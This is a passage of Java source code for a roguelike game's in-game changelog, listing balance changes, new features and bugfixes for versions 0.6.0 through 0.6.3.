"Sungrass is almost as effective as a potion of healing when used properly, which is extremely strong for a seed. I am increasing the time it takes to heal, so that hunger and combat while waiting can add some cost to the otherwise very powerful healing sungrass provides.\n" +
"\n" +
"_-_ Sungrass now grants healing significantly more slowly, scaling to ~40% speed at high levels\n" +
"_-_ Taking damage no longer reduces sungrass healing\n" +
"_-_ Sungrass healing no longer dissapears at full HP\n" +
"\n" +
"Earthroot is also problematic, as its 50% damage resist makes it an extremely potent tool against bosses, yet not so useful against regular enemies. My hope is that this change levels its power out over both situations.\n" +
"\n" +
"_-_ Earthroot now blocks up to a certain amount of damage, based on depth, rather than 50% damage"));
changes.addButton( new ChangeButton( new ItemSprite(ItemSpriteSheet.POTION_CRIMSON, null), new PotionOfHealing().trueName(),
"Heal potion drops have had their RNG bounded in shattered for a long time, but this bound was always fairly lax. This meant that people who wanted to slowly farm for potions could still amass large numbers of them. I have decided to reign this in more harshly.\n" +
"\n" +
"_-_ Health potion drops now lower in probability more quickly after potions have already been dropped from a given enemy type\n" +
"\n" +
"This change should not seriously affect the average player, but does make hoarding health potions much less feasible."));
}
public static void add_v0_6_3_Changes( ArrayList<ChangeInfo> changeInfos ){
ChangeInfo changes = new ChangeInfo("v0.6.3", true, "");
changes.hardlight(Window.TITLE_COLOR);
changeInfos.add(changes);
changes = new ChangeInfo(Messages.get(ChangesScene.class, "new"), false, null);
changes.hardlight( Window.TITLE_COLOR );
changeInfos.add(changes);
changes.addButton( new ChangeButton(Icons.get(Icons.SHPX), "Developer Commentary",
"_-_ Released February 14th, 2018\n" +
"_-_ 113 days after Shattered v0.6.2\n" +
"\n" +
"Dev commentary will be added here in the future."));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.TRIDENT, null), "Ranged Weapons Overhaul!",
"Ranged weapons have been completely overhauled!\n\n" +
"_-_ Quantity of ranged weapons decreased, however most ranged weapons now last for several uses before breaking.\n\n" +
"_-_ Ranged weapon effectiveness increased significantly.\n\n" +
"_-_ Ranged weapons are now dropped in more situations, and do not replace melee weapons.\n\n" +
"_-_ Existing ranged weapons reworked, 5 new ranged weapons added.\n\n" +
"_-_ Warrior now starts with throwing stones, rogue starts with throwing knives"));
changes.addButton( new ChangeButton( new Image(Assets.HUNTRESS, 0, 15, 12, 15), "Huntress",
"Huntress adjusted due to ranged weapon changes (note that this is not a full class rework):\n\n" +
"_-_ Huntress no longer has a chance to reclaim a single ranged weapon.\n\n" +
"_-_ Missile weapons now have 50% greater durability when used by the huntress.\n\n" +
"_-_ Boomerang dmg increased to 1-6 from 1-5\n" +
"_-_ Boomerang str req reduced to 9 from 10\n" +
"_-_ Knuckleduster dmg reduced to 1-5 from 1-6"));
changes.addButton( new ChangeButton( new ItemSprite(ItemSpriteSheet.CHILLING_DART, null), "Expanded Alchemy",
"It is now possible to use alchemy to tip darts!\n\n" +
"_-_ Every seed (except blandfruit) can now be combined with two darts to make two tipped darts.\n\n" +
"_-_ Tipped dart effects are similar to their potion/seed counterparts.\n\n" +
"_-_ Curare darts are now paralytic darts, and paralyze for 5 turns, up from 3\n\n" +
"_-_ Alchemy interface now features a recipes button to show you what you can create."));
changes.addButton( new ChangeButton( new ItemSprite(ItemSpriteSheet.RING_TOPAZ, null), Messages.get(RingOfSharpshooting.class, "name"),
"Ring of Sharpshooting overhauled\n\n" +
"_-_ No longer grants bonus accuracy\n\n" +
"_-_ Now increases ranged weapon durability, instead of giving a chance to not consume them\n\n" +
"_-_ Now increases ranged weapon damage, scaling based on the weapon's initial damage."));
changes = new ChangeInfo(Messages.get(ChangesScene.class, "changes"), false, null);
changes.hardlight( CharSprite.WARNING );
changeInfos.add(changes);
changes.addButton( new ChangeButton(new Image(Assets.BUFFS_LARGE, 32, 0, 16, 16), "Changes to debuffs and resistances",
"The game's resistance system has been totally overhauled, to allow for more flexibility and consistency.\n\n" +
"Previously, if a character was resistant to something, its effect would be reduced by a random amount between 0% and 100%.\n\n" +
"Now, resistances are much less random, applying a specific reduction to harmful effects. Currently all resistances are 50%.\n\n" +
"Resistances are also now much more consistent between different creatures. e.g. all non-organic enemies are now immune to bleed.\n\n" +
"A few things have been adjusted due to this:\n\n" +
"_-_ The Rotting Fist is now immune to paralysis.\n" +
"_-_ Psionic blast now deals 100% of current HP, instead of 100% of max HP.\n" +
"_-_ Damage from fire now scales with max HP, and is slightly lower below 40 max HP."));
changes.addButton( new ChangeButton( new WandOfCorrosion(),
"Wand of venom is now wand of corrosion. This is primarily a visual rework, with only some changes to functionality:\n\n" +
"_-_ Wand now shoots bolts of caustic gas, instead of venom gas\n" +
"_-_ Venom debuff is now corrosion debuff, functionality unchanged\n\n" +
"_-_ Battlemage now inflicts ooze with a staff of corrosion, instead of poison."));
changes.addButton( new ChangeButton(Icons.get(Icons.PREFS), Messages.get(ChangesScene.class, "misc"),
"_-_ Performance improvements to the fog of war & mind vision.\n\n" +
"_-_ Improved the consistency of how ranged traps pick targets.\n\n" +
"_-_ Weapons and armor can now be found upgraded and cursed. Overall curse chance unchanged.\n\n" +
"_-_ Each shop now always stocks 2 random tipped darts\n\n" +
"_-_ Starting weapons can no longer appear in hero's remains\n\n" +
"_-_ The ghost hero is no longer unaffected by all buffs, and is also immune to corruption"));
changes.addButton( new ChangeButton(new Image(Assets.SPINNER, 144, 0, 16, 16), Messages.get(ChangesScene.class, "bugfixes"),
"Fixed:\n" +
"_-_ Various crash bugs\n" +
"_-_ Serious memory leaks on android 8.0+\n" +
"_-_ Rankings not retaining challenges completed\n" +
"_-_ Scroll of psionic blast debuffing a dead hero\n" +
"_-_ Rot lashers not being considered minibosses\n" +
"_-_ Wand of corruption ignoring NPCs\n" +
"_-_ NPCs being valid targets for assassin\n" +
"_-_ Wand of frost battlemage effect not activating as often as it should.\n" +
"_-_ Items in the alchemy window rarely being lost\n" +
"_-_ Various minor visual bugs"));
changes.addButton( new ChangeButton(Icons.get(Icons.LANGS), Messages.get(ChangesScene.class, "language"),
"In English:\n" +
"_-_ Fixed inconsistent text when equipping cursed artifacts\n\n" +
"Updated Translations"));
changes = new ChangeInfo(Messages.get(ChangesScene.class, "buffs"), false, null);
changes.hardlight( CharSprite.POSITIVE );
changeInfos.add(changes);
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.RING_EMERALD, null), Messages.get(RingOfElements.class, "name"),
"Thanks to the increased flexibility of the improved resistance system, buffing the ring of elements is now possible!\n\n" +
"_-_ Now reduces the duration and damage of harmful effects significantly more at higher levels.\n\n" +
"_-_ Rather than granting a chance to resist elemental/magic damage, ring now grants a set percentage resistance to these effects, which increases each level.\n\n" +
"_-_ Ring now applies to more elemental/magical effects than before."));
changes.addButton( new ChangeButton(new Image(Assets.MAGE, 0, 90, 12, 15), "Warlock",
"The warlock is underperforming relative to the battlemage at the moment, and so he is getting an adjustment to his ability.\n\n" +
"This should hopefully both increase his power, and further encourage investing upgrades in wands.\n\n" +
"_-_ Reduced the base soul mark chance by 40%\n" +
"_-_ Increased soul mark chance scaling by 100%\n\n" +
"Soul mark chance reaches pre-adjustment levels at a +2 wand, and grows from there."));
changes.addButton( new ChangeButton( new ItemSprite(ItemSpriteSheet.WAND_MAGIC_MISSILE, null), "Minor Wand buffs",
"Wand of Corruption:\n" +
"_-_ Reduced the corruption resistance of wraiths by ~40%\n" +
"_-_ Enemies now drop their loot (including ranged weapons) when corrupted.\n" +
"_-_ If an enemy is immune to a particular debuff, corruption will now try to give a different debuff, instead of doing nothing.\n\n" +
"Wand of Corrosion:\n" +
"_-_ Corrosion damage growth will continue at 1/2 speed when the damage cap is reached, rather than stopping completely."));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.FLAIL, null), "Weapon and Glyph buffs",
"Weapons with non-standard accuracy are generally weak, so they have been buffed across the board:\n\n" +
"_-_ Flail accuracy penalty reduced by 10%\n" +
"_-_ Handaxe accuracy bonus increased by 9.5%\n" +
"_-_ Mace accuracy bonus increased by 8%\n" +
"_-_ BattleAxe accuracy bonus increased by 6.5%\n" +
"_-_ WarHammer accuracy bonus increased by 5%\n\n" +
"Glyph Buffs:\n" +
"_-_ Glyph of obfuscation no longer reduces damage blocking, but is also less powerful.\n" +
"_-_ Glyph of entanglement now gives more herbal armor, and root duration decreases at higher armor levels."));
changes = new ChangeInfo(Messages.get(ChangesScene.class, "nerfs"), false, null);
changes.hardlight( CharSprite.NEGATIVE );
changeInfos.add(changes);
changes.addButton( new ChangeButton(new Image(Assets.WARRIOR, 0, 90, 12, 15), "Berserker",
"The previous berserker nerf from 0.6.2 had little effect on his overall winrate, so I'm trying again with a different approach, based around having a permanent penalty for each use of berserk.\n\n" +
"_-_ Reverted exhaustion nerf from 0.6.2\n\n" +
"_-_ Decreased lvls to recover rage to 2 from 3\n" +
"_-_ Berserking now reduces max health by 20%"));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.RING_ONYX, null), new RingOfEvasion().trueName(),
"The ring of evasion has always been a very powerful ring, but the recent freerunner rework has increased the power of evasiveness in general, making the ring overbearingly strong.\n\n" +
"Evasion synergy has been adjusted:\n" +
"_-_ Ring of evasion no longer synergizes as strongly with freerunner or armor of swiftness.\n" +
"_-_ Previously their affects would multiply together, they now add to eachother instead.\n\n" +
"And the ring itself has been nerf/simplified:\n" +
"_-_ Ring of evasion no longer grants stealth"));
}
public static void add_v0_6_2_Changes( ArrayList<ChangeInfo> changeInfos ){
ChangeInfo changes = new ChangeInfo("v0.6.2", true, "");
changes.hardlight(Window.TITLE_COLOR);
changeInfos.add(changes);
changes = new ChangeInfo(Messages.get(ChangesScene.class, "new"), false, null);
changes.hardlight( Window.TITLE_COLOR );
changeInfos.add(changes);
changes.addButton( new ChangeButton(Icons.get(Icons.SHPX), "Developer Commentary",
"_-_ Released October 24th, 2017\n" +
"_-_ 70 days after Shattered v0.6.1\n" +
"\n" +
"Dev commentary will be added here in the future."));
changes.addButton( new ChangeButton( Icons.get(Icons.DEPTH), "Dungeon Secrets!",
"The secrets of the dungeon have been totally redesigned!\n\n" +
"_-_ Regular rooms can no longer be totally hidden\n\n" +
"_-_ 12 new secret rooms added, which are always hidden\n\n" +
"_-_ Hidden doors are now harder to find automatically\n\n" +
"_-_ Searching now consumes 6 turns of hunger, up from 2.\n\n" +
"This is a big adjustment to how secrets work in the dungeon. The goal is to make secrets more interesting, harder to find, and also more optional."));
changes.addButton( new ChangeButton( new Image(Assets.ROGUE, 0, 15, 12, 15), "Rogue Rework!",
"The rogue has been reworked! His abilities have received a number of changes to make his strengths more pronounced and focused.\n\n" +
"These abilities have been _removed:_\n" +
"_-_ Gains evasion from excess strength on armor\n" +
"_-_ Gains hunger 20% more slowly\n" +
"_-_ Identifies rings by wearing them\n" +
"_-_ Has an increased chance to detect secrets\n\n" +
"These abilities have been _added:_\n" +
"_-_ Searches in a wider radius than other heroes\n" +
"_-_ Is able to find more secrets in the dungeon\n\n" +
"Make sure to check out the Cloak of Shadows and Dagger changes as well."));
changes.addButton( new ChangeButton( new Image(Assets.ROGUE, 0, 90, 12, 15), "Rogue Subclasses Rework!",
"Both of the rogue's subclasses has been reworked, with an emphasis on more powerful abilities that need more interaction from the player.\n\n" +
"_The Assassin:_\n" +
"_-_ No longer gains a free +25% damage on surprise attacks\n" +
"_-_ Now prepares for a deadly strike while invisible, the longer he waits the more powerful the strike becomes.\n" +
"_-_ Charged attacks have special effects, such as blinking to the target and dealing bonus damage to weakened enemies.\n\n" +
"_The Freerunner:_\n" +
"_-_ No longer gains movement speed when not hungry or encumbered\n" +
"_-_ Now gains 'momentum' as he runs. Momentum increases evasion and movement speed as it builds.\n" +
"_-_ Momentum is rapidly lost when standing still.\n" +
"_-_ Evasion gained from momentum scales with excess strength on armor."));
changes.addButton( new ChangeButton( new Image(Assets.TERRAIN_FEATURES, 16, 0, 16, 16), "Trap Overhaul!",
"Most of the game's traps have received changes, some have been overhauled entirely!\n\n" +
"_-_ Removed Spear and Paralytic Gas Traps\n" +
"_-_ Lightning Trap is now Shocking and Storm traps\n" +
"_-_ Elemental Traps now all create fields of their element\n" +
"_-_ Worn and Poison Trap are now Worn and Poison Dart Trap\n" +
"_-_ Dart traps, Rockfall Trap, and Disintegration Trap are now always visible, but attack at a range\n" +
"_-_ Warping Trap reworked, no longer sends to previous floors\n" +
"_-_ Gripping and Flashing Traps now never deactivate, but are less harmful\n\n" +
"_-_ Tengu now uses Gripping Traps\n\n" +
"_-_ Significantly reduced instances of items appearing ontop of item-destroying traps"));
changes.addButton( new ChangeButton( new ItemSprite(ItemSpriteSheet.LOCKED_CHEST, null), "Chest Adjustments",
"_-_ Crystal chests are now opened by crystal keys.\n\n" +
"_-_ Golden chests now sometimes appear in the dungeon, containing more valuable items."));
changes.addButton( new ChangeButton( new ItemSprite(ItemSpriteSheet.IRON_KEY, null), "New Key Display",
"The key display has been overhauled!\n\n" +
"_-_ Each key type now has its own icon, instead of all special keys being shown as golden.\n\n" +
"_-_ Can now display up to 6 keys, up from 3. After 3 keys the key icons will become smaller.\n\n" +
"_-_ Button background now dims as keys are collected, for added visual clarity."));
changes = new ChangeInfo(Messages.get(ChangesScene.class, "changes"), false, null);
changes.hardlight( CharSprite.WARNING );
changeInfos.add(changes);
changes.addButton( new ChangeButton(new WandOfCorruption(),
"The Wand of Corruption has been reworked!\n\n" +
"_-_ Corruption resistance is now based on enemy exp values, not max HP. Low HP and debuffs still reduce enemy corruption resistance.\n\n" +
"_-_ Wand now only spends 1 charge per shot, and inflicts debuffs on enemies if it fails to corrupt. Debuffs become stronger the closer the wand got to corrupting.\n\n" +
"_-_ Corrupted enemies are now considered by the game to be ally characters.\n\n" +
"_-_ Corrupted enemies award exp immediately as they are corrupted.\n\n" +
"These changes are aimed at making the wand more powerful, and also less of an all-in wand. Wand of Corruption is now useful even if it doesn't corrupt an enemy."));
changes.addButton( new ChangeButton( new Image(Assets.STATUE, 0, 0, 12, 15), "AI and Enemy Changes",
"_-_ Characters now have an internal alignment and choose enemies based on that. Friendly characters should now never attack eachother.\n\n" +
"_-_ Injured characters will now always have a persistent health bar, even if they aren't being targeted.\n\n" +
"_-_ Improved enemy emote visuals, they now appear more frequently and there is now one for losing a target.\n\n" +
"_-_ Enemies now always lose their target after being teleported."));
changes.addButton( new ChangeButton(Icons.get(Icons.PREFS), Messages.get(ChangesScene.class, "misc"),
"_-_ Buff icons can now be tinted, several buffs take advantage of this to better display their state.\n\n" +
"_-_ Wands that fire magical bolts now push on their detonation area, opening doors and trampling grass.\n\n" +
"_-_ Crystal chest rooms will now always have a different item type in each chest.\n\n" +
"_-_ Burning and freezing now destroy held items in a more consistent manner.\n\n" +
"_-_ Reduced enemies in dark floors to 1.5x, from 2x.\n" +
"_-_ Increased the brightness of the fog of war.\n" +
"_-_ Various internal code improvements.\n" +
"_-_ Added a new interface and graphics for alchemy.\n" +
"_-_ Zooming is now less stiff at low resolutions.\n" +
"_-_ Improved VFX when items are picked up.\n" +
"_-_ Improved older updates in the changes list.\n" +
"_-_ Game now mutes during phone calls on android 6.0+"));
changes.addButton( new ChangeButton(new Image(Assets.SPINNER, 144, 0, 16, 16), Messages.get(ChangesScene.class, "bugfixes"),
"Fixed:\n" +
"_-_ Various crash bugs\n" +
"_-_ Various exploits players could use to determine map shape\n" +
"_-_ Artifacts sometimes removed from quickslot when equipped\n" +
"_-_ Items removed from quickslots when containers are bought\n" +
"_-_ Swapping misc items not working with a full inventory\n" +
"_-_ Enemies sometimes not waking from sleep\n" +
"_-_ Swarms not duplicating over hazards\n" +
"_-_ Black bars on certain modern phones\n" +
"_-_ Action button not persisting between floors\n" +
"_-_ Various bugs with multiplicity curse\n" +
"_-_ Various minor visual bugs\n" +
"_-_ Plants not updating terrain correctly\n" +
"_-_ Enemies spawning ontop of exit stairs\n" +
"_-_ Evil Eyes sometimes skipping beam chargeup\n" +
"_-_ Warrior's seal being disabled by armor kit\n" +
"_-_ Gladiator being able to combo non-visible enemies\n" +
"_-_ Music volume being ignored in certain cases\n" +
"_-_ Game music not correctly pausing on android 2.2/2.3\n" +
"_-_ Game failing to save in rare cases"));
changes.addButton( new ChangeButton(Icons.get(Icons.LANGS), Messages.get(ChangesScene.class, "language"),
"In English:\n" +
"_-_ Improved some common game log entries\n" +
"_-_ Fixed a typo when enemies die out of view\n" +
"_-_ Fixed a typo in the ghost hero's introduction\n" +
"_-_ Fixed a typo in dirk description\n" +
"_-_ Fixed various text errors with venom\n" +
"\n" +
"_-_ Translation Updates\n" +
"_-_ Various Translation Updates\n" +
"_-_ Added new language: _Turkish_\n" +
"_-_ New Language: _Czech_"));
changes = new ChangeInfo(Messages.get(ChangesScene.class, "buffs"), false, null);
changes.hardlight( CharSprite.POSITIVE );
changeInfos.add(changes);
changes.addButton( new ChangeButton(new CloakOfShadows(),
"As part of the rogue rework, the cloak of shadows has been significantly buffed:\n\n" +
"_-_ Max charges have been halved, however each charge is roughly twice as useful.\n" +
"_-_ As there are half as many charges total, charge rate is effectively increased.\n" +
"_-_ Cooldown mechanic removed, cloak can now be used multiple times in a row.\n" +
"_-_ Cloak levelling progression changed, it is now much more dependant on hero level\n\n" +
"These changes should let the rogue go invisible more often, and with more flexibility."));
changes.addButton( new ChangeButton(new Dagger(),
"As part of the rogue rework, sneak attack weapons have been buffed:\n\n" +
"_-_ Dagger sneak attack minimum damage increased to 75% from 50%.\n" +
"_-_ Dirk sneak attack minimum damage increased to 67% from 50%\n" +
"_-_ Assassin's blade sneak attack minimum damage unchanged at 50%\n\n" +
"This change should hopefully give the rogue some needed earlygame help, and give him a more clear choice as to what item he should upgrade, if no items were found in the dungeon."));
changes.addButton( new ChangeButton(new Flail(),
"The flail's downsides were too harsh, so one of them has been changed both to make its weaknesses more centralized and to hopefully increase its power.\n\n" +
"_-_ Flail no longer attacks at 0.8x speed, instead it has 20% reduced accuracy."));
changes.addButton( new ChangeButton( new ItemSprite(ItemSpriteSheet.POTION_GOLDEN, null), "Potion Adjustments",
"Potion of Purification buffed:\n" +
"_-_ Drinking effect now lasts for 20 turns, up from 15.\n" +
"_-_ Drinking now provides immunity to all area-bound effects, not just gasses.\n\n" +
"Potion of Frost buffed:\n" +
"_-_ Now creates a freezing field which lasts for several turns."));
changes = new ChangeInfo(Messages.get(ChangesScene.class, "nerfs"), false, null);
changes.hardlight( CharSprite.NEGATIVE );
changeInfos.add(changes);
changes.addButton( new ChangeButton(new Image(Assets.WARRIOR, 0, 90, 12, 15), "Berserker",
"The Berserker's survivability and power have been reduced to help bring him into line with the other subclasses:\n\n" +
"_-_ Bonus damage from low health reduced significantly when below 50% HP. 2x damage while berserking is unchanged.\n\n" +
"_-_ Turns of exhaustion after berserking increased to 60 from 40. Damage reduction from exhaustion stays higher for longer."));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.REMAINS, null), "Heroes Remains",
"_-_ Remains can no longer contain progression items, such as potions of strength or scrolls of upgrade.\n\n" +
"_-_ All upgradeable items dropped by remains are now capped at +3 (+0 for artifacts)\n\n" +
"The intention for remains is so a previously failed run can give a nice surprise and tiny boost to the next one, but these items are both too strong and too easy to abuse.\n\n" +
"In compensation, it is now much less likely to receive gold from remains, unless that character died with very few items."));
}
public static void add_v0_6_1_Changes( ArrayList<ChangeInfo> changeInfos ){
ChangeInfo changes = new ChangeInfo("v0.6.1", true, "");
changes.hardlight(Window.TITLE_COLOR);
changeInfos.add(changes);
changes = new ChangeInfo(Messages.get(ChangesScene.class, "new"), false, null);
changes.hardlight( Window.TITLE_COLOR );
changeInfos.add(changes);
changes.addButton( new ChangeButton(Icons.get(Icons.SHPX), "Developer Commentary",
"_-_ Released August 15th, 2017\n" +
"_-_ 72 days after Shattered v0.6.0\n" +
"\n" +
"Dev commentary will be added here in the future."));
changes.addButton( new ChangeButton( new ItemSprite(ItemSpriteSheet.GUIDE_PAGE, null), "Journal Additions",
"_-_ Overhauled the Journal window with loads of new functionality\n\n" +
"_-_ Added a completely overhauled tutorial experience, which replaces the existing signpost system.\n\n" +
"_-_ Massively expanded the items catalog, now contains every identifiable item in the game."));
changes.addButton( new ChangeButton(BadgeBanner.image(Badges.Badge.ALL_ITEMS_IDENTIFIED.image), "Badge Changes",
"_-_ Added new badges for identifying all weapons, armor, wands, and artifacts.\n\n" +
"_-_ All identification-based badges are now tied to the new item list system, and progress for them will persist between runs.\n\n" +
"_-_ Removed the Night Hunter badge\n\n" +
"_-_ The 'Many Deaths' badge now covers all death related badges, previously it was not covering 2 of them.\n\n" +
"_-_ Reduced the numbers of games needed for the 'games played' badges from 10/100/500/2000 to 10/50/250/1000\n\n" +
"_-_ Blank badges shown in the badges menu are now accurate to how many badges you have left to unlock."));
changes.addButton( new ChangeButton( Icons.get(Icons.DEPTH), "Dungeon Changes",
"_-_ Added 5 new regional rooms\n" +
"_-_ Added two new uncommon room types\n" +
"_-_ Added a new type of tunnel room\n\n" +
"_-_ Level layouts now more likely to be dense and interconnected.\n\n" +
"_-_ Tunnels will now appear more consistently.\n\n" +
"_-_ Ascending stairs, descending stairs, and mining no longer increase hunger."));
changes.addButton( new ChangeButton( new ItemSprite(ItemSpriteSheet.RING_TOPAZ, null), new RingOfEnergy().trueName(),
"_-_ Added the ring of energy."));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.CHEST, null), "Sprites",
"New sprites for the following:\n" +
"_-_ Chests & Mimics\n" +
"_-_ Darts\n" +
"_-_ Javelins\n" +
"_-_ Tomahawks"));
changes = new ChangeInfo(Messages.get(ChangesScene.class, "changes"), false, null);
changes.hardlight( CharSprite.WARNING );
changeInfos.add(changes);
changes.addButton( new ChangeButton( new ItemSprite(ItemSpriteSheet.RING_DIAMOND, null), "Ring Mechanics Changes",
"Rings now handle upgrades and curses more similarly to other items:\n\n" +
"_-_ Rings are now found at +0, down from +1, but are more powerful to compensate.\n\n" +
"_-_ Curses no longer affect ring upgrades, it is now impossible to find negatively upgraded rings.\n\n" +
"_-_ Cursed rings are now always harmful regardless of their level, until the curse is cleansed.\n\n" +
"_-_ Scrolls of upgrade have a chance to remove curses on a ring, scrolls of remove curse will always remove the curse."));
changes.addButton( new ChangeButton( new ItemSprite(ItemSpriteSheet.RING_AMETHYST, null), new RingOfWealth().trueName(),
"The ring of wealth is getting a change in emphasis, moving away from affecting items generally, and instead affecting item drops more strongly.\n\n" +
"_-_ No longer grants any benefit to item spawns when levels are generated.\n\n" +
"_-_ Now has a chance to generate extra loot when defeating enemies.\n\n" +
"I'm planning to make further tweaks to this item in future updates."));
changes.addButton( new ChangeButton( new ItemSprite(ItemSpriteSheet.POTION_CRIMSON, null), new PotionOfHealing().trueName(),
"Health Potions are getting a changeup to make hoarding and chugging them less effective, and to encourage a bit more strategy than to just drink them on the verge of death.\n\n" +
"_-_ Health potions now heal in a burst that fades over time, rather than instantly.\n\n" +
"_-_ Health potions now heal more than max HP at low levels, and slightly less than max HP at high levels.\n\n" +
"Make sure to read the dew vial changes as well."));
changes.addButton( new ChangeButton( new DewVial(),
"The dew vial (and dew) are having their healing abilities enhanced to improve the availability of healing in the sewers, and to help offset the health potion changes.\n\n" +
"_-_ Dew drops now heal 5% of max HP\n\n" +
"_-_ Dew vial now always spawns on floor 1\n\n" +
"_-_ The dew vial is now full at 20 drops, drinking heals 5% per drop and is instantaneous.\n\n" +
"_-_ Dew will always be collected into an available vial, even if the hero is below full HP.\n\n" +
"_-_ When drinking from the vial, the hero will now only drink as many drops as they need to reach full HP."));
changes.addButton( new ChangeButton( new Image(Assets.STATUE, 0, 0, 12, 15), "AI Changes",
"_-_ Improvements to pathfinding. Characters are now more prone to take efficient paths to their targets, and will prefer to wait instead of taking a very inefficient path.\n\n" +
"_-_ Characters will now more consistently decide who to attack based on distance and who they are being attacked by."));
changes.addButton( new ChangeButton(new Image(Assets.SPINNER, 144, 0, 16, 16), Messages.get(ChangesScene.class, "bugfixes"),
"Fixed:\n" +
"_-_ Issues with Android 7.0+ multi-window\n" +
"_-_ Rare stability issues on certain devices\n" +
"_-_ Numerous rare crash and freeze bugs\n" +
"_-_ Chasm death not showing in rankings\n" +
"_-_ Resting icon sometimes not appearing\n" +
"_-_ Various minor graphical bugs\n" +
"_-_ The ambitious imp rarely blocking paths\n" +
"_-_ Berserk prematurely ending after loading\n" +
"_-_ Mind vision not updating while waiting\n" +
"_-_ Troll blacksmith destroying broken seal\n" +
"_-_ Wands always being uncursed by upgrades\n" +
"_-_ Various bugs with Evil Eyes\n" +
"_-_ Thieves being able to escape while visible\n" +
"_-_ Enemies not visually dying in rare cases\n" +
"_-_ Visuals flickering while zooming on low resolution devices.\n" +
"_-_ Various minor bugs with the buff indicator\n" +
"_-_ Sleep-immune enemies being affected by magical sleep\n" +
"_-_ Sad Ghost being affected by corruption\n" +
"_-_ Switching places with the Sad Ghost over chasms causing the hero to fall"));
changes.addButton( new ChangeButton(Icons.get(Icons.PREFS), Messages.get(ChangesScene.class, "misc"),
"_-_ Completely overhauled the changes scene (which you're currently reading!)\n" +
"_-_ Item and enemy spawn RNG is now more consistent. Should prevent things like finding 4 crabs on floor 3.\n" +
"_-_ The compass marker now points toward entrances after the amulet has been acquired.\n" +
"_-_ Improved quickslot behaviour when items are removed by monks or thieves.\n" +
"_-_ Allies are now better able to follow you through bosses.\n" +
"_-_ Lloyd's Beacon's return function is no longer blocked by none-hostile creatures.\n" +
"_-_ Performance tweaks on devices with 2+ cpu cores\n" +
"_-_ Stepping on plants now interrupts the hero\n" +
"_-_ Improved potion and scroll inventory icons\n" +
"_-_ Increased landscape width of some windows\n" +
"_-_ Un-IDed artifacts no longer display charge"));
changes.addButton( new ChangeButton(Icons.get(Icons.LANGS), Messages.get(ChangesScene.class, "language"),
"Fixed in English:\n" +
"_-_ Missing capitalization in Prison Guard text\n" +
"_-_ Typo when trying a locked chest with no key\n" +
"_-_ Missing period in alarm trap description\n\n" +
"_-_ Added new Language: _Catalan_\n\n" +
"_-_ Various translation updates"));
changes = new ChangeInfo(Messages.get(ChangesScene.class, "buffs"), false, null);
changes.hardlight( CharSprite.POSITIVE );
changeInfos.add(changes);
changes.addButton( new ChangeButton( new UnstableSpellbook(),
"The Unstable spellbook wasn't really worth upgrading, so it's getting some new effects to make it worth investing in!\n\n" +
"_-_ Infusing a scroll into the unstable spellbook will now grant a unique empowered effect whenever that scroll's spell is cast from the book.\n\n" +
"To compensate, charge mechanics have been adjusted:\n\n" +
"_-_ Max charges reduced from 3-8 to 2-6\n\n" +
"_-_ Recharge speed has been reduced slightly" ));
changes.addButton( new ChangeButton( new DriedRose().upgrade(10),
"The ghost hero summoned by the rose is now much more capable and is also much less temporary:\n\n" +
"_-_ Ghost can now be equipped with a weapon and armor and uses them just like the hero.\n" +
"_-_ Ghost no longer takes damage over time as long as the rose remains equipped.\n" +
"_-_ Ghost health increased by 10\n" +
"_-_ Ghost now has a persistent HP bar\n" +
"_-_ Ghost can now follow you between floors\n\n" +
"However:\n\n" +
"_-_ Ghost no longer gains damage and defense from rose levels, instead gains strength to use better equipment.\n" +
"_-_ Rose no longer recharges while ghost is summoned\n" +
"_-_ Rose takes 25% longer to fully charge" ));
changes.addButton( new ChangeButton( Icons.get(Icons.BACKPACK), "Inventory",
"_-_ Inventory space increased from 19 slots to 20 slots.\n\n" +
"_-_ Gold indicator has been moved to the top-right of the inventory window to make room for the extra slot." ));
changes = new ChangeInfo(Messages.get(ChangesScene.class, "nerfs"), false, null);
changes.hardlight( CharSprite.NEGATIVE );
changeInfos.add(changes);
changes.addButton( new ChangeButton( new HornOfPlenty(),
"The Horn of Plenty was providing a bit too much value in the earlygame, especially without upgrades:\n\n" +
"_-_ Charge Speed reduced, primarily at lower levels:\n-20% at +0\n-7.5% at +10\n\n" +
"_-_ Upgrade rate adjusted, Food now contributes towards upgrades exactly in line with how much hunger it restores. This means smaller food items will contribute more, larger ones will contribute less. Rations still grant exactly 1 upgrade each."));
changes.addButton( new ChangeButton( new ItemSprite(ItemSpriteSheet.RING_GARNET, null), new RingOfMight().trueName(),
"The Ring of Might's strength bonus is already extremely valuable, having it also provide an excellent health boost was simply too much:\n\n" +
"_-_ Health granted reduced from +5 per upgrade to +3.5% of max hp per upgrade.\n\n" +
"This is a massive reduction to its earlygame health boosting power, however as the player levels up this will improve. By hero level 26 it will be as strong as before this change."));
changes.addButton( new ChangeButton( new EtherealChains(),
"The ability for Ethereal Chains to pull you literally anywhere limits design possibilities for future updates, so I've added a limitation.\n\n" +
"_-_ Ethereal chains now cannot reach locations the player cannot reach by walking or flying. e.g. the chains can no longer reach into a locked room.\n\n" +
"_-_ Ethereal chains can now reach through walls on boss floors, but the above limitation still applies."));
}
public static void add_v0_6_0_Changes( ArrayList<ChangeInfo> changeInfos ){
ChangeInfo changes = new ChangeInfo("v0.6.0", true, "");
changes.hardlight(Window.TITLE_COLOR);
changeInfos.add(changes);
changes.addButton( new ChangeButton(Icons.get(Icons.SHPX), "Developer Commentary",
"_-_ Released June 4th, 2017\n" +
"_-_ 116 days after Shattered v0.5.0\n" +
"\n" +
"Dev commentary will be added here in the future."));
changes.addButton( new ChangeButton( Icons.get(Icons.DEPTH), "Levelgen Overhaul!",
"Level creation algorithm overhauled!\n\n" +
"_-_ Levels are now much less box-shaped\n" +
"_-_ Sewers are now smaller, caves+ are now larger\n" +
"_-_ Some rooms can now be much larger than before\n" +
"_-_ Added 8 new standard room types, and loads of new standard room layouts\n\n" +
"_-_ Reduced number of traps in later chapters"));
changes.addButton( new ChangeButton(new ItemSprite(new Torch()), "Light Source Buffs",
"_-_ Light sources now grant significantly more vision\n" +
"_-_ Light from torches now lasts 20% longer\n" +
"_-_ Slightly increased visibility on floor 22+\n" +
"_-_ Floor 21 shop now sells 3 torches, up from 2"));
